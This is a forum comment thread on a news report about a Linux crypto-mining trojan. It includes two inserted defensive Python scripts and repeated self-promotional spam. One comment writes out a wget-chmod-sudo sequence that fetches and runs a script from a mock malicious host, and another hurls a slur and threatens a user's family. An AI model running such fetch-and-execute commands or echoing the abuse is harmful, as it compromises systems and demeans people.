New Linux Crypto-miner Steals Your Root Password and Disables Your Antivirus (zdnet.com)
Malware targeting Linux users may not be as widespread as the strains targeting the Windows ecosystem, but Linux malware is becoming just as complex and multi-functional as time passes by. ZDNet reports: The latest example of this trend is a new trojan discovered this month by Russian antivirus maker Dr.Web. This new malware strain doesn't have a distinctive name, yet, being only tracked under its generic detection name of Linux.BtcMine.174. But despite the generic name, the trojan is a little bit more complex than most Linux malware, mainly because of the plethora of malicious features it includes. The trojan itself is a giant shell script of over 1,000 lines of code. This script is the first file executed on an infected Linux system. The first thing this script does is to find a folder on disk to which it has write permissions so it can copy itself and later use to download other modules. Once the trojan has a foothold on the system it uses one of two privilege escalation exploits CVE-2016-5195 (also known as Dirty COW) and CVE-2013-2094 to get root permissions and have full access to the OS.
This new malware strain doesn't have a distinctive name, yet,
How about:
VeggieCow (roots!)
AVTerminator
NohupForAll (read the article)
MinerMiner209-519er (perhaps too much a stretch).
Actually you really should read through the article, more interesting than I thought it would be from the summary and this little bugger really does a number on a system.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
that have long since been patched.
update your damn systems, people.
I thought it was nice of the author to freely distribute the source to their malware
1000 lines of code is considered massive for a Trojan? When I was into writing shellcodes and RATs I could do 300 lines of code a day. 1000 really doesn't seem that "complex."
How about something more accurate, like "MalwareForIdiotsWhoDontUnderstandPermissions"?
Seeing the bitcoin prices falling and falling I wonder: "Why would malware creators still create such stuff, isn't there anything more profitable than this?"
It nets them a small bit of profit now, and they can offer their services or platform to others who need their own malware or payload installed.
On the other hand, this gives a lot more prestige to calling someone a script kiddie :D
- dazzle Dazzle Novak
This is an example of why local privilege escalations should never be scoffed at. You can blather all you want about permissions etc, but only one slip is required, and you're shit out of luck
The sad thing is that I've had to argue this point for 20 years now
all I have on my machine is creimer ebooks and videos!
Not one shred of information on /how/ the script got on the system in the first place
I'm calling bullshit on the article.
With such a critical piece of information missing, it's clearly scaremongering and pretty close to fake news.
And it seduces your mum and steals your bike.
All the security holes in EVERYTHING is really getting tiring.
Heil APK
Most Unix like systems are happy without a "root" user as long as there is a user 0 called something.
I still don't agree with the POSIX standard that allows root to write to mode 000 files. If it's 000, it was done for a reason and that means even root shouldn't be able to screw with it, particularly if it is root:root mode 000.
No antivirus and no root password. I have one machine that's pretty much always idle and another that's a laptop. I would notice the fans kick on if either of those started mining.
I think I'm good.
"Once the trojan has a foothold on the system it uses one of two privilege escalation exploits CVE-2016-5195 (also known as Dirty COW) and CVE-2013-2094 to get root permissions and have full access to the OS."
Is this really malware that is targeting systems that haven't been patched in two years?
Stopped reading after "downloads and runs". MAC (Mandatory Access Control) should be default nowadays in operating systems. DAC (Discretionary Access Control) and its ancient, dumb concepts of users and groups should be left to history and Trivia quizzes. So many vectors would not exist at all, if MAC was default with proper least-privilege policy installed and in effect for every program we use.
The Summary Wrote:
This script is the first file executed on an infected Linux system.
Let's name it systemd!
-=This sig has nothing to do with my comment. Move along now=-
A good precedent is the Morris Worm, the first major worm attack against UNIX systems. Published on Nov. 2, 1988, the worm used known vulnerabilities in popular UNIX tools such as sendmail, and also cracked weak passwords. Defenders effectively _broke_ the early Internet to contain the Morris Worm and while they frantically applied patches they'd considered risks to production systems before that day. Its author was eventually convicted, but Robert Tappan Morris had the best "get out of jail free" card one could imagine. His father was the head of the NSA. He is now a professor of computer science at MIT, and his current projects are listed at https://www.csail.mit.edu/pers... .
You sound like you actually read the article (who does that?)
Anyway does this trojan actually "steal your root password" as the story title states, or does it just use privilege escalation (on long-since patched flaws) to run as root? I mean, does "MySuper3lit3passwrd" actually get sent somewhere?
OK, curiosity got hold of me and I gave in and read the fine article (aaargh!)
The one partial-sentence quote that addressed it says, "the ability to steal user-entered passwords for the su command"
My best guesses how this would be accomplished are:
1) overwrite /bin/su with a malicious version; or
2) keylogger that logs everything, su just happens to be included
One particularly nasty bit:
The trojan will also run a function that collects information about all the remote servers the infected host has connected via SSH and will try to connect to those machines as well, to spread itself to even more systems. This SSH self-spreading mechanism is believed to be the trojan's main distribution channel. Because the trojan also relies on stealing valid SSH credentials, this means that even if some Linux sysadmins are careful to properly secure their servers' SSH connections and only allow a selected number of hosts to connect, they might not be able to prevent an infection if one of those selected hosts has been infected without his knowledge.
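The enumeration step in the quoted paragraph starts with what the infected host already knows about other machines, and a plaintext known_hosts file hands that list over. As an added example (not from the article, Dr.Web, or any commenter; the function and sample names are my own), the script below audits a known_hosts file using OpenSSH's own format: plaintext entries begin with the hostname, while entries hashed by `ssh-keygen -H` or written by a client with `HashKnownHosts yes` begin with `|1|base64(salt)|base64(HMAC-SHA1(salt, hostname))`. The hashed form still lets the client confirm a host it is about to connect to, but nothing reading the file can list the hosts.

```python
"""Audit an OpenSSH known_hosts file for hostnames an intruder could harvest.

Added example, not from the article or any commenter. Function and sample
names are assumptions; the file format is OpenSSH's own.
"""
import base64
import hashlib
import hmac

HASH_MAGIC = "|1|"  # OpenSSH's marker for a hashed host field


def hash_hostname(hostname: str, salt: bytes) -> str:
    """Build the `|1|salt|hash` host field OpenSSH writes for a hashed entry."""
    digest = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return (HASH_MAGIC + base64.b64encode(salt).decode()
            + "|" + base64.b64encode(digest).decode())


def hashed_entry_matches(host_field: str, hostname: str) -> bool:
    """True if a hashed host field was produced from hostname.

    This is the only question a hashed entry answers: you can check a name
    you already hold, but you cannot recover names from the file.
    """
    if not host_field.startswith(HASH_MAGIC):
        return False
    try:
        salt_b64, digest_b64 = host_field[len(HASH_MAGIC):].split("|", 1)
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
    except ValueError:  # missing separator or malformed base64
        return False
    actual = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(actual, expected)


def audit_known_hosts(text: str) -> dict:
    """Report hostnames readable in cleartext and the count of hashed entries."""
    exposed, hashed = [], 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields[0].startswith("@"):  # @cert-authority / @revoked marker
            fields = fields[1:]
        if len(fields) < 2:
            continue
        host_field = fields[0]
        if host_field.startswith(HASH_MAGIC):
            hashed += 1
        else:
            exposed.extend(host_field.split(","))  # "name,ip" lists several
    return {"exposed": exposed, "hashed": hashed}


# Constructed sample file; the key blob is a placeholder, not real key material.
FAKE_KEY = "ssh-ed25519 AAAA-PLACEHOLDER-NOT-A-REAL-KEY"
SAMPLE_SALT = bytes(range(20))  # fixed so the sample is reproducible; real salts are random
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# constructed sample, not a real known_hosts",
    "build01.example.internal,10.0.0.12 " + FAKE_KEY,
    "[git.example.internal]:2222 " + FAKE_KEY,
    hash_hostname("db01.example.internal", SAMPLE_SALT) + " " + FAKE_KEY,
])

if __name__ == "__main__":
    report = audit_known_hosts(SAMPLE_KNOWN_HOSTS)
    print("harvestable hostnames:", report["exposed"])
    print("hashed entries (not enumerable):", report["hashed"])
```

Whatever the audit lists as exposed is exactly what a file-reading enumeration pass would learn; `ssh-keygen -H` rewrites those entries in place. The caveat in the quoted paragraph still stands: the trojan also carries stolen credentials, so hiding the target list is only one layer, alongside per-destination keys and `from=` restrictions in authorized_keys on the receiving side.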
One may gobble up all resources on a system, rely on privilege escalation, hide logs, and be very hard to get rid of.
The other one is just malware.
MS appears not to care about bad press. The botnet stink gets replaced by the we'll force updates to 10 policy, we-control-your-W10-PC update policy, and the Windows as a recurring revenue service so we can push advertisements in programs forthcoming policy
See subject quote from the film "I AM LEGEND" & results from the recent past https://it.slashdot.org/commen... https://it.slashdot.org/commen... & https://it.slashdot.org/commen... + https://it.slashdot.org/commen... + https://it.slashdot.org/commen... https://it.slashdot.org/commen... https://search.slashdot.org/co... https://it.slashdot.org/commen...
* That's only recently while I've been on Linux (since June/July 2018) & 100's of times vs. MANY other botnets/malwares etc. in the past circa 2006-early 2018 while I was on Windows: CONCRETE VISIBLE UNDENIABLE REALITY (see those links as proof).
P.S.=> ... & that's ONLY what /. reported on (there are FAR more)... apk
Your software is just fine - well written, functional... I'm going to continue using the Host File Engine by mmell February 17, 2017
Your premise that hostfiles are a good way to deal with advertising and malvertising is quite valid - by JazzLad April 20, 2016
his hosts program is actually pretty good by xenotransplant August 10 2015
his hosts tool is actually useful for those cases in which one does indeed want to locally block stuff outright while consuming minimum system resources by alexgieg September 25 2015
I like your host file system by Karmashock September 09 2015
that APK guy, I use his host file by rogoshen1 Tuesday March 03, 2015
I personally use a HOSTS file blocker produced from a genius called APK by 110010001000 October 27 2017
* For the Win32/64 model...
APK
P.S.=> Linux model's faster/more efficient/better MERGE feature too - More coming... apk
Apk has the answer for that - really... kill automatic updates by adding a hosts file entry setting updates.steam.com or whatever to 127.0.0.1. You have to find the right hostname for each software you want to block updates on by raymorris (2726007) on Friday July 06, 2018
APK your posts on this and the hosts file posts, and more, have never been in error and/or bad advice by BlueStrat (756137) on Wednesday June 21, 2017
I support APK's stand on the hosts file and can't see why it's not used more than it is. My hosts file is 144247 lines long (4,332 Kb) it & a firewall serves me very well - by Trax3001BBS (2368736)
ABP is insufficient as a solid hosts file does everything APK reminds us about fast turtle September 17 2013
You need APK's hosts file - by Teun (17872) on Wednesday August 06, 2014
* For the Win32/64 model...
APK
P.S.=> Linux model's faster/more efficient + BETTER merge feature - More coming... apk
APK is totally right on this count. Adblock Plus on Firefox mobile is a dog on older, or lower end, phones. A hostfile based adblocker makes for a much better experience in this context. Of course, your phone has to be rooted, which isn't the case with Firefox + adblock." - by chihowa on Saturday May 16, 2015
APK solution STILL relevant Thud457 June 11 2015
In a footnote, I would like to note that I find your hosts file admirable - by vel-ex-tech (4337079) on Tuesday November 24, 2015
APK's monolithic hosts file is looking pretty good at the moment - by Culture20 on Thursday November 17
you're right about hosts files - by drinkypoo (153816) on Thursday May 26
APK, I know people give you a lot of shit regarding hosts, but please don't ever stop - by nasredin (958927) on Friday June 12, 2015 @03:34PM
APK is kinda right... I've given up on JS based adblocking and gone to blackholing in /etc/hosts, just like it was back in the 90s. The computational load has gotten intolerable for any ad-blocking using JS. I've tried his hosts file generating software. It works. - by bmo (77928) on Thursday October 15, 2015
get around to 'installing' a hosts file list, not sure which one, likely the one from someonewhocares.org. If it works as well as what I used for a while about ten years ago, I'll be happy. And grateful to APK for the lesson and the reminder. - by kermidge (2221646) on Wednesday March 27
I actually went and downloaded a 16k line hosts file and started using that after seeing that post, you know just for trying it out. some sites load up faster. - by gl4ss (559668) on Thursday November 17
dammit MS, you proved APK right about something by lgw
(APK) is still right a hosts file really does work. It even blocked a some of the video ads that were inserted into a stream OrangeTide February 10 2016
the Host File Engine performs exactly as promised - by mmell (832646) on Thursday February 16, 2017
I do use APK's host file on all my systems at home by OrangeTide December 01 2017
I've never tried to belittle (APK's work), I've flat out said it's good - by BronsCon (927697) on Thursday February 11, 2016 @06:48PM (#51491263)
(Toss on 100,000++ users worldwide too!)
* For the Win32/64 model...
APK
P.S.=> Linux model's faster/more efficient + BETTER merge feature... apk
name it Gnome 3
These kinds of stories come about every year subscription year.
See it was worth reading! It had all kinds of interesting stuff packed in there.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Why would I run AV on a linux system? Screw scanning for MSFT viruses.
Root access should be possible only through sudo, never directly (with very few exceptions).
Only a noob would allow root with a password. You can get root from the console if you need it or by using a highly restricted ssh connection that only allows key/cert based connections and only from very specific IPs. People can't be this stupid. Sorry - I'll take that back.
And the only reason I've used AV on Linux was because a stupid E&O Insurance policy mandated it. The insurance company didn't understand that running AV on non-Windows systems is almost always stupid. But I couldn't speak with anyone inside the insurance company who actually had a clue.
People who have a clue do not work for insurance companies.
Sent from my ASR33 using ASCII
Do you really think nobody knows you're a lying faggot propagandist on this entire website, after all the years of your bullshit getting blown away like 30 minutes ago when your +4 went to -1 Troll, you casually lying faggot? Lol bitch.
There will be consequences for your dishonest advocacy for you and your entire family.
Ironically the script is placed in /etc/rc.local. Probably perfectly compatible with sysVinit.
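Two indicators come up in this thread: the guess a few comments up that the su password theft works by overwriting /bin/su, and the note here that the script parks itself in /etc/rc.local. As an added example (not from the article, Dr.Web, or any commenter; every function name is my own), the script below records a baseline of content hash, owner and mode for a set of files and reports what drifted, plus which non-comment lines appeared in rc.local. It runs against constructed stand-in files in a temporary directory so it works offline; on a real host you would baseline /bin/su (root:root, mode 4755) and /etc/rc.local and keep the baseline somewhere the host cannot rewrite.

```python
"""Baseline-and-compare check for a replaced su and an edited rc.local.

Added example, not from the article or any commenter. The demo uses
constructed stand-in files; function names are assumptions, not a tool's API.
"""
import hashlib
import os
import stat
import tempfile

FIELDS = ("sha256", "uid", "gid", "mode")


def fingerprint(path: str) -> dict:
    """Content hash plus ownership and permission bits of one file."""
    st = os.lstat(path)
    with open(path, "rb") as fh:
        digest = hashlib.sha256(fh.read()).hexdigest()
    return {"sha256": digest, "uid": st.st_uid, "gid": st.st_gid,
            "mode": stat.S_IMODE(st.st_mode)}


def take_baseline(paths) -> dict:
    """Fingerprint every path once; store this away from the host."""
    return {p: fingerprint(p) for p in paths}


def compare(baseline: dict, paths) -> list:
    """List (path, field, old, new) for every attribute that drifted."""
    drift = []
    for p in paths:
        if p not in baseline:
            drift.append((p, "presence", None, "new file"))
            continue
        now, then = fingerprint(p), baseline[p]
        drift.extend((p, k, then[k], now[k]) for k in FIELDS if now[k] != then[k])
    return drift


def rc_local_additions(baseline_text: str, current_text: str) -> list:
    """Non-comment lines in rc.local now that were absent from the baseline copy."""
    known = {ln.strip() for ln in baseline_text.splitlines()}
    return [ln for ln in current_text.splitlines()
            if ln.strip() and not ln.strip().startswith("#")
            and ln.strip() not in known]


def demo() -> dict:
    """Constructed scenario: stand-ins for su and rc.local, baselined, then altered."""
    with tempfile.TemporaryDirectory() as d:
        su, rc = os.path.join(d, "su"), os.path.join(d, "rc.local")
        with open(su, "wb") as fh:
            fh.write(b"#!/bin/sh\n# stand-in for /bin/su\n")
        os.chmod(su, 0o755)  # the real binary is setuid root (4755)
        rc_before = "#!/bin/sh\nexit 0\n"
        with open(rc, "w") as fh:
            fh.write(rc_before)
        baseline = take_baseline([su, rc])

        # Simulated tampering (constructed): su rewritten and re-permissioned,
        # a launcher line inserted into rc.local (placeholder path).
        with open(su, "ab") as fh:
            fh.write(b"echo not-the-real-su\n")
        os.chmod(su, 0o700)
        rc_after = "#!/bin/sh\n/var/tmp/placeholder-dropper.sh &\nexit 0\n"
        with open(rc, "w") as fh:
            fh.write(rc_after)

        changed = sorted({(os.path.basename(p), k)
                          for p, k, _, _ in compare(baseline, [su, rc])})
        return {"changed": changed,
                "rc_additions": rc_local_additions(rc_before, rc_after)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a package-managed host the same content check comes for free from `dpkg --verify` or `rpm -V`, but those compare against a database the root-level trojan can also edit, which is why the baseline belongs off the box.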
Remember back when companies in the early 2000s would brag that their software was over a million lines of code, as a testament to some sort of level of complexity? Apparently that threshold has been pushed all the way back to only 1000 lines of code. Honestly, I blame all these copy-paste script kiddies who have never actually written code for thinking that a 1000 line program is "complex" or "large" by any stretch of the imagination.
"Not as clumsy/random as a blaster - An elegant weapon 4 a more civilized age" https://it.slashdot.org/commen...
* "For over a 1,000 generations Jedi Knights were guardians of peace & justice in the old Republic. Before the dark times. Before the EMPIRE"
(NOT "wannabe weapons" of TROLL shitlords on /. like ZIP https://it.slashdot.org/commen... - theirs = effete downmods I RUN 'EM DRY OF & lies & WHY they LOSE).
APK
P.S.=> Many here know https://linux.slashdot.org/com... & enjoy greater speed/security/reliability & anonymity hosts yield natively speeding you up 2 ways (adblocks & hardcodes that protect vs. DNS security issues in redirect poisoning + request tracking logs & RESOLVE FASTER locally from RAM driven by KERNELMODE speed vs. slow usermode in "solutions" packed w/ security issues (DNS/Antivirus) OR not working fully by default (adblock) in usermode addons easily detected by webmasters & blocked doing less but using more)... apk
This is what Windows admins do not understand. Executable bits are turned off in Linux by default. To make anything bad happen, an admin would have to download the virus, make it executable, and run it - preferably as root.
wget http://virus.kremlin.ru/linuxvirus.sh
chmod +x ./linuxvirus.sh
sudo ./linuxvirus.sh
Any Linux admin that is smart enough to run these commands is smart enough not to do this.
Bring them all on. Linux is rock solid and all I got to say is bring them all on.
Having to run unsigned binary executables isn't exactly linux but a bastardisation huh? It's common now. Run as root too
A blog I run for the wealth
nt
GENERATION 26: The first time you see this, copy it into your sig on any forum and add 1 to the generation.
Since when do Linux systems have antivirus as a norm? You could scan some unnecessary executable downloads, but that's it. There is no need for a permanent resource hog sitting, eating and making you smile with a security illusion. When some bad code has run, the system has to be reinstalled fully. It's already dead inside. So when you install some unknown code, you could as well do that. The greatest security threat is still the promiscuous user.